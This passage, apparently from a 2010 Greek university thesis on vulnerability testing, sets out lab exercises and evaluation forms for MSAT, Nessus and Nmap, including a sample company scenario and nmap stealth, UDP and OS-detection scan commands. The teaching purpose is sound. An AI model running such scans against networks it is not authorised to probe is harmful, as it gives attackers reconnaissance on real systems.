5. Ποια θέματα θα πρέπει να περιλαμβάνει η εκπαίδευση του προσωπικού σχετικά με την ασφάλεια του

πληροφοριακού συστήματος;

6. Ποιες πολιτικές ασφάλειας θα πρέπει να αναπτυχθούν άμεσα;

Page 247: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

247 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

6.6.3 Σύνθετη Άσκηση

ΕΡΓΑΣΤΗΡΙΑΚΗ ΑΣΚΗΣΗ 3

ΓΙΑ ΤΟ ΕΡΓΑΛΕΙΟ

MSAT

Εργαλείο MSAT

Γνωστικό Πεδίο Ανάλυση Επικινδυνότητας (Risk Analysis)

Τύπος Άσκησης Τεχνική

Βαθμός Δυσκολίας 3

Συμμετοχή Ομάδες 2 ατόμων

Ώρες Διδασκαλίας 60 Λεπτά

Στόχος

Στόχος αυτής της άσκησης είναι η ενασχόληση των φοιτητών με την αξιολόγηση της

ασφάλειας σε περισσότερο σύνθετα ΠΣ. Αναμένεται μέσω αυτής της άσκησης οι φοιτητές

να κατανοήσουν έννοιες σχετικά με:

• την πολύπλευρη προσέγγιση του θέματος της ασφάλειας ενός ΠΣ

• την ανάγκη τακτικής εκπαίδευσης των χρηστών

• την αναγκαιότητα ύπαρξης σχεδίου ανάκαμψης

Περιγραφή

Οι εγκαταστάσεις της εταιρείας παραγωγής πλαστικών, ΠΛΑΣΤΙΚΑ ΑΕ, αποτελούνται από

το εργοστάσιο, τα γραφεία της διοίκησης και δύο υποκαταστήματα. Τα γραφεία της

διοίκησης και το εργοστάσιο βρίσκονται στον ίδιο χώρο, αλλά σε διαφορετικά κτίρια. Τα

Πληροφοριακά της Συστήματα, μεταξύ άλλων, αξιοποιούν τις ασύρματες τεχνολογίες και τις

τεχνολογίες απομακρυσμένης πρόσβασης, ενώ χρησιμοποιούν εφαρμογές τρίτων.

Αναλυτικότερα περιλαμβάνουν:

• 65 προσωπικούς υπολογιστές με λειτουργικό σύστημα Microsoft Windows ΧΡ,

• 10 φορητούς υπολογιστές

• 30 εκτυπωτές προσωπικής χρήσης,

• 12 εκτυπωτές δικτύου που είναι τοποθετημένοι σε διάφορα γραφεία, καθώς και

• 6 εξυπηρετητές με λειτουργικό σύστημα Microsoft Windows 2003 που είναι

τοποθετημένοι σε ειδικό χώρο με πυροπροστασία, κλιματισμό κλπ.

Page 248: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

248 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

Συγκεκριμένα, υπάρχουν:

• 3 εξυπηρετητές εφαρμογών και βάσεων δεδομένων, ένας στο κεντρικό και δύο στα

υποκαταστήματα

• 1 εξυπηρετητής εφαρμογών παραγωγικής διαδικασίας,

• 1 εξυπηρετητής WWW και e-mail

• 1 εξυπηρετητής για παραγωγή αντιγράφων ασφαλείας.

Οι εφαρμογές PlasticLine, CompanyManager, RemoteOrder και EasyMail έχουν αναπτυχθεί

από εξωτερικούς προμηθευτές και αφορούν την παροχή υπηρεσιών: παραγωγής, ERP,

λήψης παραγγελιών και webmail αντίστοιχα.

Οι εξυπηρετητές και ο κεντρικός δικτυακός εξοπλισμός των κεντρικών γραφείων βρίσκονται

στο γραφείο του υπεύθυνου πληροφοριακών συστημάτων και προστατεύονται από διακοπή

ρεύματος. Οι εξυπηρετητές των υποκαταστημάτων βρίσκονται στο γραφείο του διευθυντή.

Η δικτύωση των συστημάτων, τόσο της διοίκησης όσο και των υποκαταστημάτων,

περιλαμβάνει ένα τοπικό δίκτυο (LAN) με δομημένη καλωδίωση, ενώ το εργοστάσιο με τα

γραφεία της διοίκησης συνδέονται ασύρματα. Η εταιρεία διαθέτει σύνδεση στο διαδίκτυο

για υπηρεσίες WWW και e-mail.

Για την προστασία του ΠΣ χρησιμοποιούνται Αναχώματα Ασφάλειας και αντι-ιομορφικό

λογισμικό (antivirus).

Οι πωλητές της εταιρείας συνδέονται από το φορητό τους υπολογιστή απομακρυσμένα με

την εφαρμογή λήψης παραγγελιών και καταχωρούν τις παραγγελίες των πελατών τους. Για

τον έλεγχο ταυτότητάς τους χρησιμοποιούνται ζεύγη αναγνωριστικών-συνθηματικών

(username-passwords) που καθορίζονται από το διαχειριστή συστήματος.

Η εταιρεία συνέταξε μια πολιτική ασφάλειας πριν από δυο χρόνια, για την οποία το

προσωπικό ενημερώνεται κατά την πρόσληψή του.

Ο διαχειριστής του ΠΣ λό γω φό ρτου εργασίας εκτελεί ελέγχους το πο λύ δύο φο ρές το

χρόνο, ενώ τα αντίγραφα ασφάλειας που λαμβάνονται σε εβδομαδιαία βάση φυλάσσονται

στο γραφείο του, ώστε αν υπάρξει κάποιο πρόβλημα να μπορέσει να ανακάμψει άμεσα το

σύστημα.

Page 249: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

249 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

Διευκρινίζεται ότι οι φοιτητές θα χρειαστεί να κάνουν κάποιες παραδοχές κατά το τρέξιμο

του εργαλείου.

Παραδοτέο

Με την ολοκλήρωση της άσκησης οι φοιτητές θα πρέπει να συμπληρώσουν και να

παραδώσουν το ακόλουθο έντυπο μαζί με την εκτύπωση της αναφοράς που παράγει το

εργαλείο.

Page 250: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

250 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

ΦΥΛΛΟ ΑΞΙΟΛΟΓΗΣΗΣ ΕΡΓΑΣΤΗΡΙΟΥ ΑΣΦΑΛΕΙΑΣ ΠΣ

Εργαλείο

MSAT

Ονοματεπώνυμο: Ημερομηνία:

Αρ. Μητρώου: e-mail:

Ονοματεπώνυμο/α συνεργάτη/τών:

Άσκηση: Όνομα & ΙΡ μηχανήματος:

Απαντήστε στα παρακάτω:

1. Αναφέρατε τρεις τουλάχιστον κρίσιμες ευπάθειες που εντόπισε το εργαλείο. Σε ποιους επιμέρους

τομείς εντοπίζονται;

2. Ποιες είναι οι παρατηρήσεις σας για την εκπαίδευση του προσωπικού;

3. Προσδιορίστε τουλάχιστον δύο απειλές για το ΠΣ που σχετίζονται με την έλλειψη συνεχούς

εκπαίδευσης του προσωπικού.

4. Ποιες είναι οι παρατηρήσεις σας για το σχέδιο ανάκαμψης από καταστροφή;

5. Προσδιορίστε τουλάχιστον δύο κινδύνους για το ΠΣ από την απουσία ύπαρξης σχεδίου ανάκαμψης.

6. Ποιες είναι οι παρατηρήσεις σας για την πολιτική ασφάλειας της εταιρείας;

Page 251: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

251 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

6.7 Nessus

6.7.1 Εισαγωγική Άσκηση

ΕΡΓΑΣΤΗΡΙΑΚΗ ΑΣΚΗΣΗ 1

ΓΙΑ ΤΟ ΕΡΓΑΛΕΙΟ

NESSUS

Εργαλείο NESSUS

Γνωστικό Πεδίο Εντοπισμός Ευπαθειών (Vulnerability Scanning)

Τύπος Άσκησης Τεχνική

Βαθμός Δυσκολίας 1

Συμμετοχή Ομάδες 2 ατόμων

Ώρες Διδασκαλίας 60 Λεπτά

Στόχος

Στόχος αυτής της άσκησης είναι αφενός η εξοικείωση των φοιτητών με τη χρήση του

εργαλείου και αφετέρου ο εντοπισμός ευπαθειών σε ανοιχτές θύρες και σε υπηρεσίες που

εκτελούνται σε ένα πληροφοριακό σύστημα που χρησιμοποιεί Windows λειτουργικό.

Αναμένεται μέσω αυτής της άσκησης οι φοιτητές να κατανοήσουν καλύτερα τις έννοιες που

σχετίζονται με:

• με τις θύρες και τις υπηρεσίες που εκτελούνται σε αυτές

• τις ευπάθειες των ανοιχτών θυρών ενός πληροφοριακού συστήματος

• τις ευπάθειες των υπηρεσιών που εκτελούνται στις ανοιχτές θύρες

Περιγραφή

Οι φοιτητές θα πρέπει να εκκινήσουν την εφαρμογή Nessus, να κάνουν λήψη των

τελευταίων plugins και να δημιουργήσουν ένα χρήστη στο Nessus Server με δικαιώματα

διαχειριστή. Εναλλακτικά αυτό μπορεί να έχει γίνει πιο πριν από τον εισηγητή. Στη συνέχεια

θα πρέπει να πραγματοποιήσουν σάρωση σε ένα μηχάνημα που χρησιμοποιεί Windows XP,

αφού πρώτα δημιουργήσουν μια πολιτική σάρωσης.

Παραδοτέο

Με την ολοκλήρωση της άσκησης οι φοιτητές θα πρέπει να συμπληρώσουν και να

παραδώσουν το ακόλουθο έντυπο.

Page 252: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

252 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

ΦΥΛΛΟ ΑΞΙΟΛΟΓΗΣΗΣ ΕΡΓΑΣΤΗΡΙΟΥ ΑΣΦΑΛΕΙΑΣ ΠΣ

Εργαλείο

NESSUS

Ονοματεπώνυμο: Ημερομηνία:

Αρ. Μητρώου: e-mail:

Ονοματεπώνυμο/α συνεργάτη/τών:

Άσκηση: Όνομα & ΙΡ μηχανήματος:

Απαντήστε στα παρακάτω:

1. Πόσες θύρες και ποιες εντόπισε το εργαλείο να είναι ενεργές στο σύστημα που πραγματοποιήσατε τη

σάρωση; Ποιες υπηρεσίες είναι ενεργές;

2. Πόσες ευπάθειες εντόπισε το εργαλείο; Απαριθμήστε τες με βάση την κρισιμότητά τους.

3. Καταγράψτε τις κρίσιμες ευπάθειες που εντόπισε το εργαλείο.

4. Οι κρίσιμες ευπάθειες που εντοπίστηκαν, τι συνέπειες μπορεί να επιφέρουν στο πληροφοριακό

σύστημα;

5. Με ποιόν τρόπο μπορούν να αντιμετωπιστούν οι κρίσιμες ευπάθειες που εντοπίστηκαν;

6. Από τις κρίσιμες ευπάθειες που εντόπισε το εργαλείο, ποια θα επιλύατε πρώτη και για ποιο λόγο;

Page 253: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

253 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

6.7.2 Μέτριας Εντάσεως Άσκηση

ΕΡΓΑΣΤΗΡΙΑΚΗ ΑΣΚΗΣΗ 2

ΓΙΑ ΤΟ ΕΡΓΑΛΕΙΟ

NESSUS

Εργαλείο NESSUS

Γνωστικό Πεδίο Εντοπισμός Ευπαθειών (Vulnerability Scanning)

Τύπος Άσκησης Τεχνική

Βαθμός Δυσκολίας 2

Συμμετοχή Ομάδες 2 ατόμων

Ώρες Διδασκαλίας 60 Λεπτά

Στόχος

Στόχος αυτής της άσκησης είναι η εξάσκηση των φοιτητών σε πιο προχωρημένα θέματα

αναζήτησης ευπαθειών σε ένα πληροφοριακό σύστημα. Αναμένεται μέσω αυτής της

άσκησης οι φοιτητές να κατανοήσουν καλύτερα τις έννοιες που σχετίζονται με:

• τον προσδιορισμό συγκεκριμένων ελέγχων που θα πραγματοποιηθούν στο πληροφοριακό

σύστημα

• τον προσδιορισμό των κατάλληλων διαπιστευτηρίων (credentials) που θα

χρησιμοποιηθούν

• τους τρόπους αντιμετώπισης των κρίσιμων ευπαθειών

Περιγραφή

Οι φοιτητές θα πρέπει να εκκινήσουν την εφαρμογή Nessus, να δημιουργήσουν μια πολιτική

σάρωσης η οποία θα περιλαμβάνει τα κατάλληλα για το σύστημα που ελέγχεται credentials,

να απενεργοποιήσουν τα plugins που αφορούν ελέγχους σε μέρη του συστήματος τα οποία

δεν περιλαμβάνει το υπό έλεγχο σύστημα και να πραγματοποιήσουν τη σάρωση.

Παραδοτέο

Με την ολοκλήρωση της άσκησης οι φοιτητές θα πρέπει να συμπληρώσουν και να

παραδώσουν το ακόλουθο έντυπο.

Page 254: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

254 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

ΦΥΛΛΟ ΑΞΙΟΛΟΓΗΣΗΣ ΕΡΓΑΣΤΗΡΙΟΥ ΑΣΦΑΛΕΙΑΣ ΠΣ

Εργαλείο

NESSUS

Ονοματεπώνυμο: Ημερομηνία:

Αρ. Μητρώου: e-mail:

Ονοματεπώνυμο/α συνεργάτη/τών:

Άσκηση: Όνομα & ΙΡ μηχανήματος:

Απαντήστε στα παρακάτω:

1. Προσδιορίστε πως ορίσατε τα Credentials κατά τη δημιουργία της πολιτικής σάρωσης.

2. Προσδιορίστε ποιους ελέγχους – Plugins συμπεριλάβατε στην πολιτική σάρωσης.

3. Καταγράψτε τις κρίσιμες ευπάθειες που εντόπισε το εργαλείο.

4. Τι συνέπειες μπορεί να επιφέρουν στο πληροφοριακό σύστημα οι κρίσιμες ευπάθειες που

εντοπίστηκαν;

5. Από τις ευπάθειες που εντοπίσατε ποια θεωρείται περισσότερο επικίνδυνη και γιατί;

6. Πιστεύετε ότι με τη χρήση των Credentials και των κατάλληλων Plugins επιτυγχάνεται καλύτερος

προσδιορισμός των ευπαθειών του συστήματος; Γιατί;

Page 255: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

255 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

6.7.3 Σύνθετη Άσκηση

ΕΡΓΑΣΤΗΡΙΑΚΗ ΑΣΚΗΣΗ 3

ΓΙΑ ΤΟ ΕΡΓΑΛΕΙΟ

NESSUS

Εργαλείο NESSUS

Γνωστικό Πεδίο Εντοπισμός Ευπαθειών (Vulnerability Scanning)

Τύπος Άσκησης Τεχνική

Βαθμός Δυσκολίας 3

Συμμετοχή Ομάδες 2 ατόμων

Ώρες Διδασκαλίας 60 Λεπτά

Στόχος

Στόχος αυτής της άσκησης είναι η εξάσκηση των φοιτητών στην αναζήτηση ευπαθειών

στους εξυπηρετητές του δικτύου αφού πρώτα πραγματοποιήσουν σάρωση θυρών και

εντοπίσουν ενεργές θύρες στις οποίες εκτελούνται υπηρεσίες εξυπηρετητών. Αναμένεται

μέσω αυτής της άσκησης οι φοιτητές να κατανοήσουν καλύτερα τις έννοιες που σχετίζονται

με:

• την ανίχνευση θυρών οι οποίες εκτελούν υπηρεσίες εξυπηρετητών

• τον προσδιορισμό των κατάλληλων plugins που θα χρησιμοποιηθούν για την ανίχνευση

των ευπαθειών servers

• τους τρόπους αντιμετώπισης των κρίσιμων ευπαθειών

Περιγραφή

Οι φοιτητές θα πρέπει να χρησιμοποιήσουν το εργαλείο Nmap για να προσδιορίσουν τους

κόμβους του δικτύου οι οποίοι φιλοξενούν υπηρεσίες εξυπηρετητών. Στη συνέχεια θα πρέπει

να εκκινήσουν την εφαρμογή Nessus, να δημιουργήσουν μια πολιτική σάρωσης η οποία θα

περιλαμβάνει μόνο τα κατάλληλα για τον έλεγχο των servers, που εντοπίστηκαν ενεργοί στο

δίκτυο, plugins και να πραγματοποιήσουν τη σάρωση.

Παραδοτέο

Με την ολοκλήρωση της άσκησης οι φοιτητές θα πρέπει να συμπληρώσουν και να

παραδώσουν το ακόλουθο έντυπο.

Page 256: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

256 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

ΦΥΛΛΟ ΑΞΙΟΛΟΓΗΣΗΣ ΕΡΓΑΣΤΗΡΙΟΥ ΑΣΦΑΛΕΙΑΣ ΠΣ

Εργαλείο

NESSUS

Ονοματεπώνυμο: Ημερομηνία:

Αρ. Μητρώου: e-mail:

Ονοματεπώνυμο/α συνεργάτη/τών:

Άσκηση: Όνομα & ΙΡ μηχανήματος:

Απαντήστε στα παρακάτω:

1. Ποια τεχνική σάρωσης χρησιμοποιήσατε με το εργαλείο Nmap; Περιγράψτε τι είδους ελέγχους

πραγματοποιεί.

2. Η σάρωση με το εργαλείο Nmap εντόπισε υπηρεσίες εξυπηρετητών να εκτελούνται στο δίκτυό σας;

Αν και καταγράψτε την ΙΡ διεύθυνση του κόμβου, τις θύρες στις οποίες εκτελούνται οι servers καθώς

και το είδος τους..

3. Προσδιορίστε ποιες οικογένειες plugins χρησιμοποιήσατε στην πολιτική σάρωσης με το εργαλείο

Nessus.

4. Πόσες ευπάθειες εντοπίστηκαν; Ποιες είναι κρίσιμες; Ποιες υπηρεσίες αφορούν και σε ποια θύρα

εντοπίστηκαν;

5. Ποιους κινδύνους διατρέχει το πληροφοριακό σύστημα; Προτείνετε μέτρα αντιμετώπισης.

Page 257: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

257 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

6.8 Nmap

6.8.1 Εισαγωγική Άσκηση

ΕΡΓΑΣΤΗΡΙΑΚΗ ΑΣΚΗΣΗ 1

ΓΙΑ ΤΟ ΕΡΓΑΛΕΙΟ

NMAP

Εργαλείο NMAP

Γνωστικό Πεδίο Εξερεύνηση δικτύου (Network Scanning)

Τύπος Άσκησης Τεχνική

Βαθμός Δυσκολίας 1

Συμμετοχή Ομάδες 2 ατόμων

Ώρες Διδασκαλίας 60 Λεπτά

Στόχος

Στόχος αυτής της άσκησης είναι η εξοικείωση των φοιτητών με το εργαλείο και η επίδειξη

των βασικότερων δυνατοτήτων του. Αναμένεται μέσω αυτής της άσκησης οι φοιτητές να

κατανοήσουν καλύτερα τις έννοιες που σχετίζονται με:

• με την ανίχνευση των κόμβων ενός δικτύου

• τις θύρες που είναι ανοιχτές και ακροάζονται σε έναν κόμβο

• τις υπηρεσίες που εκτελούνται στις ανοιχτές θύρες

• τις ευπάθειες των θυρών και των υπηρεσιών που μπορούν να θέσουν σε κίνδυνο το ΠΣ

Περιγραφή

Οι φο ιτητές θα πρέπει να εκκινήσουν την εφαρμογή Nmap-Zenmap GUI, σε γραφικό

περιβάλλον. Στη συνέχεια θα πρέπει να προσδιορίσουν μια περιοχή διευθύνσεων του

δικτύου στην οποία θα εκτελέσει σάρωση το εργαλείο καθώς και το είδος των ελέγχων που

θα πραγματοποιηθούν μέσω της επιλογής του κατάλληλου Profile (Προτείνεται το Intense

Scan). Τέλος θα πραγματοποιήσουν τη σάρωση και θα απαντήσουν στις ερωτήσεις του

φύλλου αξιολόγησης.

Παραδοτέο

Με την ολοκλήρωση της άσκησης οι φοιτητές θα πρέπει να συμπληρώσουν και να

παραδώσουν το ακόλουθο έντυπο.

Page 258: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

258 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

ΦΥΛΛΟ ΑΞΙΟΛΟΓΗΣΗΣ ΕΡΓΑΣΤΗΡΙΟΥ ΑΣΦΑΛΕΙΑΣ ΠΣ

Εργαλείο

NMAP

Ονοματεπώνυμο: Ημερομηνία:

Αρ. Μητρώου: e-mail:

Ονοματεπώνυμο/α συνεργάτη/τών:

Άσκηση: Όνομα & ΙΡ μηχανήματος:

Απαντήστε στα παρακάτω:

1. Πόσους ενεργούς κόμβους εντόπισε το εργαλείο στο δίκτυο; Καταγράψτε την MAC και ΙΡ διεύθυνσή

τους καθώς και το όνομα κάθε κόμβου.

2. Ποιες θύρες είναι ενεργές σε κάθε κόμβο και ποιες υπηρεσίες τρέχουν σε αυτές;

3. Κατάφερε το εργαλείο να εντοπίσει το λειτουργικό σύστημα που εκτελείται σε κάθε κόμβο και γιατί;

Καταγράψτε τα ευρήματα.

4. Τι πληροφορίες παρέχει το εργαλείο για το δρομολογητή του δικτύου;

5. Τι πληροφορίες αποκομίσατε για την τοπολογία του δικτύου;

Page 259: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

259 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

6. Δημιουργήστε ένα δικό σας Profile σάρωσης και καταγράψτε τα είδη των ελέγχων που επιλέξατε.

Αιτιολογήστε τις επιλογές σας.

7. Ποιες από τις πληροφορίες που συλλέχτηκαν με το εργαλείο μπορούν να φανούν χρήσιμες σε έναν

επιτιθέμενο και γιατί;

Page 260: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

260 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

6.8.2 Μέτριας Εντάσεως Άσκηση

ΕΡΓΑΣΤΗΡΙΑΚΗ ΑΣΚΗΣΗ 2

ΓΙΑ ΤΟ ΕΡΓΑΛΕΙΟ

NMAP

Εργαλείο NMAP

Γνωστικό Πεδίο Εξερεύνηση δικτύου (Network Scanning)

Τύπος Άσκησης Τεχνική

Βαθμός Δυσκολίας 2

Συμμετοχή Ομάδες 2 ατόμων

Ώρες Διδασκαλίας 60 Λεπτά

Στόχος

Στόχος αυτής της άσκησης είναι η εξοικείωση των φοιτητών με χρήση του εργαλείου από τη

γραμμή εντολών (command line) και ο εντοπισμός πιθανών ευπαθών σημείων των Κόμβους

του δικτύου. Αναμένεται μέσω αυτής της άσκησης οι φοιτητές να κατανοήσουν καλύτερα:

• τις τεχνικές που χρησιμοποιούνται για:

o την ανίχνευση των κόμβων ενός δικτύου,

o τις θύρες που είναι ενεργές και ακροάζονται σε έναν κόμβο,

o τις υπηρεσίες που εκτελούνται στις ανοιχτές θύρες,

o την κρυφής (stealth) σάρωσης ενός δικτύου

• τις ευπάθειες των υπηρεσιών που μπορούν να θέσουν σε κίνδυνο το ΠΣ

Περιγραφή

Οι φοιτητές πρέπει να εκκινήσουν το BackTrack 4 σε Virtual Machine και να

ενεργοποιήσουν τη δικτυακή σύνδεση. Η ενεργοποίηση γίνεται ανοίγοντας ένα τερματικό

(shell) και πληκτρολογώντας ifconfig eth0 up και στη συνέχεια dhclient eth0.

Στη συνέχεια από το K Menu επιλέγουν BackTrack->Network Mapping->All-

>Nmap.

Αντικείμενο μελέτης θα αποτελέσουν οι ακόλουθες εντολές:

# nmap -sP <ip_address/24>

# nmap -sP -PT80 <ip_address/24>

# nmap -sT <ip_address>

# nmap -sS <ip_address>

Page 261: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

261 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

# nmap -sU <ip_address>

# nmap -sS -O <ip_address>

# nmap -sS -p 21,23,53,80 -O -v <ip_address>

Οι φοιτητές θα πρέπει να αναγνωρίσουν τη λειτουργία κάθε εντολής, να την εκτελέσουν και

να καταγράψουν τα ευρήματα.

Παραδοτέο

Με την ολοκλήρωση της άσκησης οι φοιτητές θα πρέπει να συμπληρώσουν και να

παραδώσουν το ακόλουθο έντυπο.

Page 262: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

